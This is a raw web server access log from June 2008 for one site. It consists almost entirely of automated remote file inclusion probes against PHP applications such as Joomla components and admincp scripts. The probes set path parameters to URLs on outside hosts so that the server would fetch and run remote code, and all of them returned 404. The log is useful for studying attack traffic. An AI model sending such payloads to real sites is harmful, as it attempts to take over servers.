209.62.24.242 - - [01/Jun/2008:18:06:14 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://purukcahu.sitesled.com/newbot/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.neighborhoodglimpses.com"
168.209.97.42 - - [01/Jun/2008:18:06:31 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/sofialia76/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.neighborhoodglimpses.com"
168.209.97.42 - - [01/Jun/2008:18:06:31 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/sofialia76/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:06:39 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:06:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:06:40 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:06:41 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
209.62.24.242 - - [01/Jun/2008:18:06:44 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://purukcahu.sitesled.com/newbot/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
209.62.24.242 - - [01/Jun/2008:18:06:44 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://purukcahu.sitesled.com/newbot/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "neighborhoodglimpses.com"
195.12.53.176 - - [01/Jun/2008:18:06:54 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/adam.diaz61/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.neighborhoodglimpses.com"
195.12.53.176 - - [01/Jun/2008:18:06:54 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/adam.diaz61/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.neighborhoodglimpses.com"
91.193.143.7 - - [01/Jun/2008:18:06:58 -0700] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
91.193.143.7 - - [01/Jun/2008:18:06:59 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
91.193.143.7 - - [01/Jun/2008:18:06:59 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.12.53.176 - - [01/Jun/2008:18:07:25 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/adam.diaz61/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "neighborhoodglimpses.com"
195.12.53.176 - - [01/Jun/2008:18:07:25 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/adam.diaz61/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:07:36 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:07:40 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:07:41 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:07:46 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.47.201.117 - - [01/Jun/2008:18:07:48 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
72.47.201.117 - - [01/Jun/2008:18:07:48 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.neighborhoodglimpses.com"
168.209.97.42 - - [01/Jun/2008:18:08:05 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/sofialia76/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "neighborhoodglimpses.com"
168.209.97.42 - - [01/Jun/2008:18:08:05 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/sofialia76/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:08:07 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:08:17 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
72.47.201.117 - - [01/Jun/2008:18:08:34 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "neighborhoodglimpses.com"
72.47.201.117 - - [01/Jun/2008:18:08:34 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:08:52 -0700] "GET /logs/access.log/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:08:53 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:08:53 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
72.232.196.106 - - [01/Jun/2008:18:09:04 -0700] "GET /logs/access_080211.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
72.232.196.106 - - [01/Jun/2008:18:09:04 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
67.205.67.205 - - [01/Jun/2008:18:09:06 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
80.67.24.32 - - [01/Jun/2008:18:09:20 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.neighborhoodglimpses.com"
80.67.24.32 - - [01/Jun/2008:18:09:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.neighborhoodglimpses.com"
70.87.81.18 - - [01/Jun/2008:18:09:58 -0700] "GET //nuboard_v0.5/admin/index.php?site=http://rom.as.ro/a//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.neighborhoodglimpses.com"
70.87.81.18 - - [01/Jun/2008:18:09:58 -0700] "GET /logs//nuboard_v0.5/admin/index.php?site=http://rom.as.ro/a//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.neighborhoodglimpses.com"
212.244.43.139 - - [01/Jun/2008:18:10:59 -0700] "GET /logs/access_080211.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
212.244.43.139 - - [01/Jun/2008:18:10:59 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
212.244.43.139 - - [01/Jun/2008:18:10:59 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "neighborhoodglimpses.com"
70.87.81.18 - - [01/Jun/2008:18:11:02 -0700] "GET //nuboard_v0.5/admin/index.php?site=http://rom.as.ro/a//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "neighborhoodglimpses.com"
70.87.81.18 - - [01/Jun/2008:18:11:02 -0700] "GET /logs//nuboard_v0.5/admin/index.php?site=http://rom.as.ro/a//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "neighborhoodglimpses.com"
83.65.47.4 - - [01/Jun/2008:18:12:33 -0700] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
83.65.47.4 - - [01/Jun/2008:18:12:34 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
83.65.47.4 - - [01/Jun/2008:18:12:34 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:12:54 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:12:54 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.neighborhoodglimpses.com"
207.7.108.240 - - [01/Jun/2008:18:13:54 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
207.7.108.240 - - [01/Jun/2008:18:13:54 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:18:14:30 -0700] "GET /logs/access.log//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:18:14:30 -0700] "GET //include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:14:31 -0700] "GET /logs/access.log//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:18:14:31 -0700] "GET /logs//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:14:31 -0700] "GET //include.recipients.group.subnav.php?cfg[path][contenido]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:14:31 -0700] "GET /logs//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
89.188.112.121 - - [01/Jun/2008:18:15:12 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.188.112.121 - - [01/Jun/2008:18:15:12 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:15:46 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:15:46 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:15:59 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
212.227.251.172 - - [01/Jun/2008:18:16:12 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:17:03 -0700] "GET /logs//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:17:03 -0700] "GET //include.recipients.group.subnav.php?cfg[path][contenido]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:17:40 -0700] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:17:40 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
69.70.80.22 - - [01/Jun/2008:18:17:40 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "neighborhoodglimpses.com"
72.232.196.106 - - [01/Jun/2008:18:18:10 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
72.232.196.106 - - [01/Jun/2008:18:18:10 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:18:18:14 -0700] "GET /logs//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.37.86 - - [01/Jun/2008:18:18:15 -0700] "GET //include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.227.251.172 - - [01/Jun/2008:18:18:23 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:18:28 -0700] "GET /logs/access_071001.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:18:28 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:18:28 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
89.188.112.121 - - [01/Jun/2008:18:18:34 -0700] "GET /logs/access.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.188.112.121 - - [01/Jun/2008:18:18:34 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.188.112.121 - - [01/Jun/2008:18:18:34 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.108.91.166 - - [01/Jun/2008:18:19:35 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
194.85.89.204 - - [01/Jun/2008:18:19:37 -0700] "GET /logs/access_080211.log/modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
194.85.89.204 - - [01/Jun/2008:18:19:37 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
194.85.89.204 - - [01/Jun/2008:18:19:38 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
67.205.67.205 - - [01/Jun/2008:18:20:46 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.205.67.205 - - [01/Jun/2008:18:20:46 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:20:57 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
209.216.249.194 - - [01/Jun/2008:18:20:57 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
74.8.73.90 - - [01/Jun/2008:18:23:57 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
74.8.73.90 - - [01/Jun/2008:18:23:57 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.1.202.61 - - [01/Jun/2008:18:24:09 -0700] "GET /logs/index.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
200.1.202.61 - - [01/Jun/2008:18:24:11 -0700] "GET /index.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
83.65.47.4 - - [01/Jun/2008:18:29:08 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
83.65.47.4 - - [01/Jun/2008:18:29:09 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
83.65.47.4 - - [01/Jun/2008:18:29:09 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:30:23 -0700] "GET /logs/access_080211.log/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:30:23 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
196.41.124.8 - - [01/Jun/2008:18:30:24 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:32:25 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "neighborhoodglimpses.com"
83.175.248.213 - - [01/Jun/2008:18:32:25 -0700] "GET /database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "neighborhoodglimpses.com"
207.7.108.240 - - [01/Jun/2008:18:34:05 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:34:53 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:34:53 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:34:54 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:34:54 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:34:54 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
200.229.199.197 - - [01/Jun/2008:18:34:55 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:18:34:56 -0700] "GET /logs/access.log/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:18:34:57 -0700] "GET /config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:18:34:58 -0700] "GET /logs/config.php?path_to_root=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.21.32 - - [01/Jun/2008:18:35:22 -0700] "GET /config.php?path_to_root=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.neighborhoodglimpses.com"
